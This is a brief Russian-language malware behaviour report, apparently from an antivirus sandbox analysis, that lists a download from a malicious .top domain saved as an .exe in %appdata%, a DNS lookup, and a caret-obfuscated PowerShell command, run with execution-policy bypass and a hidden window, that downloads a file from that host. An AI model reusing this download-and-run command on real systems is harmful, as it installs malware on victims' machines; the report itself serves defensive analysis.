Техническая информация
- http://rkiywansamtu.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powE^RshEll.^Ex^e -E^XEc^UtIO^npO^l^Icy Byp^a^SS -^NOPrO^file^ ^-WINdOWs^tyLe HIDd^E^N^ (^neW-^OB^Je^cT S^yst^eM.net.w^EBcli^EnT).^d^oWnlO^a^DFiLE^('http://rkiywansamtu.top/search....
- DNS ASK rk####nsamtu.top
- '<SYSTEM32>\cmd.exe' /c "powE^RshEll.^Ex^e -E^XEc^UtIO^npO^l^Icy Byp^a^SS -^NOPrO^file^ ^-WINdOWs^tyLe HIDd^E^N^ (^neW-^OB^Je^cT S^yst^eM.net.w^EBcli^EnT).^d^oWnlO^a^DFiLE^('http://rkiywansamtu.top/search.... (со скрытым окном)